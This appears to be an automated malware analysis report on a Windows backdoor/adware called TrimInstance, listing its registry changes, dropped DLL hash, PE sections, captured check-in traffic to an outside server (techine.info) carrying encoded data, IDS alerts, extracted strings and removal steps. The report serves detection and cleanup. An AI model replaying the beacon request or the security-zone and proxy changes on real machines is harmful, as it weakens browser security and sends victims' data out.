[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"3c09c42b" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"587b5709" = "V/////%%"
"8b9e4cbc" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"data.0" = "Xa0RL6a5aR76/WG xzI IsMC2TiyhIA0hiHq0mxF0j/VZU2ROBlA6JIfRxdUkflc 4n/oO5wy"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"date" = "1431203279"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"0e93c3f3" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"DisplayName" = "TrimInstance"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995]
"usr.0" = "LwAzvySUMOQIKEG xz"
[HKLM\SOFTWARE\baec5657-8322-5676-45d1-0440b8c442fe\56255081192899995\eae10f9d]
"65114b36" = "VP/l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{bca22949}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TRIMIN~1\TRIMIN~1.DLL,_uninstall /un /uq"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"f0bf0bde" = "///%"
"65114b36" = "VP/l////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"Version" = "22022131"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"7f69fa1f" = "///%"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:1764 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 96 6F 6C C0 8D 61 7C AA 41 31 0C FD 50 80 11"
The process rundll32.exe:1116 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"3efeb33e" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"f6ad6fa6" = "V/////%%"
"7f69fa1f" = "///%"
"d1abcdb6" = "///%"
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"fe94ce1e" = "V/////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"7367429f" = "///%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"0dc3ee96" = "/P////%%"
"48bd1aff" = "V/////%%"
"65114b36" = "VP/l////"
"51d2f2ea" = "K/Af/Xt/aPAS/X2/blAh/XD/axAs/XJ////%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"340d3099" = "/P////%%"
"6185d035" = "Vx/2/Cx/V//l////"
"f2c53c49" = "UlAr/XJ/c//k////"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"370856c7" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"e46c271e" = "///%"
"c6c5dd44" = "V/////%%"
"a0743acc" = "N/////%%"
"2e22d94e" = "///%"
"8b9e4cbc" = "V/////%%"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"0e93c3f3" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"2d71d5ab" = "V/////%%"
"f0bf0bde" = "///%"
"3c09c42b" = "///%"
"c99a5f5c" = "///%"
"a1dcff5b" = "V/////%%"
"a2e3b941" = "///%"
"27ddcf6f" = "///%"
"f1f24e29" = "Vl/l/C/////%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 9F FE DB 88 75 39 6A 1E FC 37 50 C5 C8 B8 20"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_bca22949\eae10f9d]
"c5705860" = "Vx////%%"
"bbf88800" = "///%"
"72758a5d" = "///%"
"414bc593" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
Dropped PE files
| MD5 | File path |
|---|---|
| d7c0adf378035b9cd317519da88c7799 | c:\Program Files\TrimInstance\TrimInstance.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 392709 | 393216 | 4.76276 | fc059c64b27e8a6ac58101150c47f0b1 |
| .rdata | 397312 | 47482 | 47616 | 4.57688 | 1b704fd0e939a4bb0426bba10095fb26 |
| .data | 446464 | 2085076 | 2074112 | 5.51958 | 191da18fb408651f75b8507ab237b7d6 |
| .rsrc | 2535424 | 16 | 512 | 0 | bf619eac0cdf3f68d496ea9344137e8b |
| .reloc | 2539520 | 20116 | 20480 | 3.06395 | 4d625b820d0ef868c345cbc136bbf2fd |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://turner.map.fastly.net/ | |
| hxxp://techine.info/get/?data=aDcYUN5Z3EYW9JL456nAZJf8KwefreYD8L1h+wTYpI1y9VpXkZmZHngSE7zwnWfgUyUhnlM67uE5irJwB90OGpwDiGHwKkIC2Z6BXuXoWg2pQBmdnwx01JS/WMO0XG3j+s0bH/Df0u747MS08MyLXGc+qfB7cRrIbi9EEJ6jTLBr3omdrXrr6TK6SnSzaA6NVy6170zvGuem2lU8fl0s1efyrmhoBrnNcjzTDHTCIPVuKIFmgvjVfcByN8k7G2Oz9PfSQ7pCuupeGNWxVWAvTXB1U/6sOE0KxYF7r+/k8vpFTr3tqEmit0KOWNqem1jw1xp14PoGAk4Kyq0Lp8LYiLPKp4ftXZ+xQHQ8BU/jUEZkx5AFU8VAx2Lsz+0TS0+o+nzxCZSaQz9bQUJERzW9NJU2l8SEAEc+48DfJRehaT7i+Js8DuflrrJs495oGLiiwfDiSGHU2FpsnL3zqzpsRXUzv+/SzUxUN0h1L5DG829Ppi3bujvOzllzg1ADUSkEh3PiJsyA9lHui0NICQB0pdqNAbgdJTJTWxnBisunr33Nsu&version=4 | |
| hxxp://edition.cnn.com/ | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin
Traffic
HEAD / HTTP/1.1
Host: edition.cnn.com
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
HTTP/1.1 200 OK
x-servedByHost: prd-10-60-170-42.nodes.56m.dmtio.net
Cache-Control: max-age=3600
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self' hXXp://*.cnn.com:* hXXps://*.cnn.com:* *.cnn.net:* *.turner.com:* *.ugdturner.com:* *.vgtf.net:*; script-src 'unsafe-inline' 'unsafe-eval' 'self' *; style-src 'unsafe-inline' 'self' *; frame-src 'self' *; object-src 'self' *; img-src 'self' *; media-src 'self' *; font-src 'self' *; connect-src 'self' *;
Content-Type: text/html; charset=utf-8
Via: 1.1 varnish
Content-Length: 266594
Accept-Ranges: bytes
Date: Sat, 09 May 2015 22:27:59 GMT
Via: 1.1 varnish
Age: 119
Connection: close
X-Served-By: cache-iad2151-IAD, cache-ams4147-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 13, 20
X-Timer: S1431210479.488919,VS0,VE0
Vary: Accept-Encoding
GET /get/?data=aDcYUN5Z3EYW9JL456nAZJf8KwefreYD8L1h+wTYpI1y9VpXkZmZHngSE7zwnWfgUyUhnlM67uE5irJwB90OGpwDiGHwKkIC2Z6BXuXoWg2pQBmdnwx01JS/WMO0XG3j+s0bH/Df0u747MS08MyLXGc+qfB7cRrIbi9EEJ6jTLBr3omdrXrr6TK6SnSzaA6NVy6170zvGuem2lU8fl0s1efyrmhoBrnNcjzTDHTCIPVuKIFmgvjVfcByN8k7G2Oz9PfSQ7pCuupeGNWxVWAvTXB1U/6sOE0KxYF7r+/k8vpFTr3tqEmit0KOWNqem1jw1xp14PoGAk4Kyq0Lp8LYiLPKp4ftXZ+xQHQ8BU/jUEZkx5AFU8VAx2Lsz+0TS0+o+nzxCZSaQz9bQUJERzW9NJU2l8SEAEc+48DfJRehaT7i+Js8DuflrrJs495oGLiiwfDiSGHU2FpsnL3zqzpsRXUzv+/SzUxUN0h1L5DG829Ppi3bujvOzllzg1ADUSkEh3PiJsyA9lHui0NICQB0pdqNAbgdJTJTWxnBisunr33Nsu&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 22:34:09 GMT
Content-Length: 0
Connection: close
The Backdoor connects to the servers at the following location(s):
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.
3Another instance of the file %s is already running.
/An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1140
rundll32.exe:1764
rundll32.exe:1116
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Program Files%\TrimInstance\TrimInstance.dll (86905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.